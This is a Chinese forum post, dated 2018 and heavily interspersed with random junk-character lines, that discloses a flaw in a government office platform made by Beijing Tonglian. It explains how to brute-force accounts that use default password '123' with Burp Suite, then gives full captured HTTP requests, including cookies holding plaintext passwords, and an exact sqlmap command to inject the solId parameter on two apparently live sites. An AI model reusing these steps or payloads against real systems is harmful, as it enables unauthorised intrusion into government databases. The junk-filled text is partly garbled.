|
! Q; F+ s5 S. o2 W
1 z! D7 g, A" O' B
" \" T: } e: B1 t" g& `2 Y
) ~1 T+ L _9 f1 D; `; m2 f3 E 平台简介:) d- k$ s1 R( U" J( h
9 i3 O7 V+ @2 D! ]" r
( a+ Y# j$ ]/ z; A! j
+ ^. ?2 E: M+ \1 _. Z n1 ^( k/ `
0 }' G$ S, m* R6 F; b$ P1 F+ E( u4 P! l, i- x% H R
北京同联信息技术有限公司(以下简称同联)由用友政务与用友原行业事业部团队合伙出资成立。同联以“为全国各级政府单位提供信息化咨询规划、建设解决方案和信息化运维服务,以加强各级政府的精细化、智能化管理,形成高效、敏捷、便民的新型政府。”为使命,致力于为各级政府单位提供专业、标准、灵活、易用的信息化产品及专业的服务。
& a0 u; X4 E* V/ E1 W同联面向政府单位提供专业、标准、灵活、易用的信息化产品。针对各级政府单位,分别提供以“移动政务办公”为主的Da3系列管理软件;针对政法单位提供以“协同办案”为核心的政法协同办案系统等。
+ X0 M6 [7 l3 p
同联本着“协作、专业、创新”的工作方针,为推动各级政府单位信息化、促进各级政府快速转型为 “智慧型政府”做出积极贡献!/ l3 X d% {3 c! N6 S6 S
1 |6 g3 e3 o; U. _0 y5 _
! E; O/ G: [7 [4 G8 ^! K ; M6 y; ` `, Y- b; V7 `
; f. ` C y2 c' m
" n1 U9 ]* t2 U
由于此程序为新开发的程序,故能找到的案例并不多,下面附案例地址:* J V# y: h, L1 ^8 T
" {! K5 n+ N# p/ q h2 Q) e
2 z- ~' [1 P( A! s6 U. i" U' m
) N1 H% b1 P+ F% Q( B5 C ^. q' `
0 S% Z% L. \4 P S4 p3 f
( |, ?" ` Q' R' {$ t- ^ b2 U http://1.1.1.1:7197/cap-aco/#(案例2-)
3 M, V1 H- E: E' ?% |8 P& L
* z- O9 G% K1 V {! a B
. r6 i. x6 d- s) ]5 ? http://www.XXOO.com (案例1-官网网站)
/ n$ |- i* l3 [
8 y$ c5 s( t% x+ b: W* T: L0 f a. f5 j; T; G: q/ v# }
a* u' ?% @6 c& @; p+ x6 C
5 O# v3 E* z( D, w9 F) y
2 z0 W5 G2 m& L1 ]3 v: f 漏洞详情:
$ K% J, ~ f2 R, s/ E- f! C
0 f: y( Y* v/ J1 Z, S, B2 M( T- F9 _+ {8 Q' B W
初步确定平台的默认账号为姓名的首字母小写,初始密码为123,为了能够更好的模拟入侵,使用黑盒测试手段进行测试 D0 c$ n% p3 s X0 }
f# b7 m, V/ d8 [! P% J! H* @( {5 h' P: p& x
首先使用burpsuite代理,然后再用黑客字典生成一个全英文小写的3位字典,利用burpsuite进行暴力破解,破解结果如图:
" O# [5 d6 S1 U% q " q( M$ e" r, \7 t6 i
1 d0 q; e5 ?4 D# ^5 ^2 f* \ : K# x# f: C8 y) @
$ i) d, d$ N# O# k
) m, Z2 O% C% s( R4 C4 K  $ l( g: Y$ I1 l- q
7 s. V- ]5 v1 V% ^; ~4 p5 P0 b
7 Q' y& n2 P- u( U! J3 j status为302即表示破解成功,然后找个破解成功的账号登录系统。经过长时间的手工测试发现在发文管理模块抓包,抓包的数据分别如下:
+ q6 K: p9 a& K) U. @ ( Y* V( h- N u4 r T
4 E# `! |% C: o4 i4 n, ^ 1、案例1-官方网站# \% Q1 ?& a. G+ Q
, m2 j0 F* x8 u; W' P4 E' e0 {: T& j( W. V) ]8 {, N
GET /bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=42b0234e-d5dc-402d-9cef-1ce38cbae480&state=&title=1111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510060789826 HTTP/1.1
1 x2 n" c7 j/ l% F) _
' s& H/ ?2 S+ l4 h: |9 E4 Y, z# P2 c. V9 F
Host: www.XXOO.com
* ^/ \( w, G, ?, e8 I( _: o) M5 l ' ^& @2 q( c P7 l9 e U- N
* A D: T! h! u/ I2 b Proxy-Connection: Keep-Alive
" G7 `' j, i; d! Y2 L " A0 U: F2 p; H$ E: A& T
, c# t8 M& |+ ] Accept: application/json, text/javascript, */*; q=0.01
) k8 W. e$ W0 f: `9 m; u: {
9 ?' _9 T4 K/ u% M9 G! c2 g+ @- P. F# i3 E6 D. {/ w% F4 j
Accept-Language: zh-CN u6 x7 x, ?" E ^
; C1 P' k+ T% _* S+ I. L; t9 B
" K2 ^6 o! T1 m Content-Type: application/json
. J8 [$ Q- ?) X0 I
7 m8 o% q" d. s" Q+ s, u5 l, M$ E& H# J4 g( E5 T' m* M+ i- p
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0; SE 2.X MetaSr 1.0) like Gecko
' ^5 u9 S3 A/ |) [8 s
& [, `, E2 s8 ~4 G0 z8 n: d6 h- `, z9 S6 r* N
X-Requested-With: XMLHttpRequest
: I6 ~2 h+ e1 K8 b8 } 7 o' m& Z( v5 N0 A
. d4 [/ o/ v0 u& A* g Referer: http://www.XXOO.com/bizRunContro ... 80?modCode=1008M002
( ^! C& a# i! w# F9 S
" i5 O; @( h4 M, _0 ]2 s1 _, D4 C
5 ? [0 W) u" l Accept-Encoding: gzip, deflate, sdch
8 w/ b& ?2 D; F+ Q. k+ k5 c7 G
9 [7 _6 J( U, Z2 t- y* T6 x) p- B6 B8 ~7 z* f4 m# K
Cookie: username=chm; password=123; rememberme=1; autoSubmit=1; sid=2cf5142f-6c1e-4cbb-89d8-2ebd08438b2e1 _" ^5 h- D) n9 V
3 s, T5 R1 O( ?9 `0 Q
6 X# H- v M0 p4 u* D" }$ s Z
将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r tl.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:$ u+ a% K5 n9 h5 @) x; M! h
X* R$ d2 l3 S
& ?; L- z) c8 a  0 ^5 p& k1 V- h
$ H- @; d8 L( f: }
8 W, T& k, E8 i: f$ z
 * X p( y& @" C$ @1 d5 M3 e
) ~8 r0 r+ v; D- A% k" N7 h3 j& d0 W' c- W4 r, p+ i( E* T
3 }5 o! W" W0 w/ ]! |
* u2 U, M. N+ F
# h4 w+ b6 H* @; l5 o; A! V' I* [5 z
2 _! p& L0 U2 d4 ^; ^4 O4 v7 o; X # x! E' N" {2 w8 D$ R$ U* G
7 T: Z2 U: h: a0 X
7 L. E6 V- N) D/ C / h# L2 I! y* O/ `
( G8 R& @& }) F( M4 n
2、案例2-某天河云平台
) s7 K. k/ u. p4 j$ A
. Q' c; G+ d6 O- g. v4 _- D3 o2 t w/ ~9 K8 P8 ~2 T* I8 F
GET /cap-aco/bpmRuBizInfoController/findBpmRuBizInfoBySolId?rows=10&page=0&solId=af056885-4ae5-4e0b-8a0d-c413a786f2db&state=&title=11111&sortOrder=DESC&query=bizTitle_%3D%26URGENCY_%3D%26STATE_%3D%26startTime%3D%26endTime%3D&_=1510047738662 HTTP/1.16 q) a, z1 D5 Q& |# l$ R# m! R
8 f# y! W: ^* T+ M. Q7 j
) J6 K% ]' T, e# G$ H; G o" T; B Host: 1.1.1.:7197
1 N1 H+ m1 M* @1 @$ A
, ^; H' K ?6 {% K$ q' n- r6 y, q
Accept: application/json, text/javascript, */*; q=0.01
: d; s3 C- p9 i3 B % P/ g. `8 ?7 h
* V' }$ }1 _8 a+ X* Q X-Requested-With: XMLHttpRequest' Q8 F0 R+ Q6 P7 y7 v
: l q" G* ^1 ~. p* [/ C
. V0 ^9 a) }7 E5 N3 C User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.221 Safari/537.36 SE 2.X MetaSr 1.0
1 q4 W2 [8 y8 d3 c1 O1 @8 y
# l% t8 f/ p, I: A! H. I
" E5 u w; R, |) }" k# B Content-Type: application/json' _7 T" t( f% v+ Z; R
9 e8 Q7 z5 I/ Q Y9 v
8 o) D# j8 W- r x w% [
Referer: http://1.1.1.1:7197/cap-aco/bizR ... 86f2db?modCode=1008
7 p" Q/ t5 [; b6 n1 X
# f3 a4 l2 b' [: z/ Z2 y( Q9 b
% X# y, i6 E8 Q8 x) C) \7 i6 r6 q Accept-Language: zh-CN,zh;q=0.8
" n$ t3 g6 l# V4 o% N ( G. T6 Q6 U9 E. N
: ~, j6 J. n, f4 a Cookie: autoSubmit=1; sid=4e333ec9-d194-456b-bb08-4ff64c6eb1fc; username=lxr; password=123; rememberme=1; autoSubmit=17 N s; N% p6 T$ d7 t3 @; P( d
" ?! d8 l, i [; t# K
+ x7 K! Q% }9 T C7 H; z) E
Connection: close+ y0 b) q9 {9 [8 K; J
9 n* z0 u a4 Z1 {
& N$ I; d) N- v* Z" K; R b 将上面post数据包复制到txt文本里保存为tl.txt并将其放到sqlmap根目录下利用sqlmap注入命令为:sqlmap.py -r 1.txt --dbms=mysql --level 5 --risk 3 --tamper=space2hash.py -p solId --is-dba 注入如图:
4 N e: v! T' c - A3 b3 ?+ H& K0 Z/ j5 L
& x. C) K R. h/ U, i o  2 ~7 ~- j, ]# W& M+ K. T2 C9 A& [
% e7 E2 w% k, x8 y' x% G) Z `4 t. H( M; F- Y6 o
0 T4 e" A1 p$ D7 n. m* ?/ A
| 
发表于 2018-10-20 20:15:17
收藏
支持
反对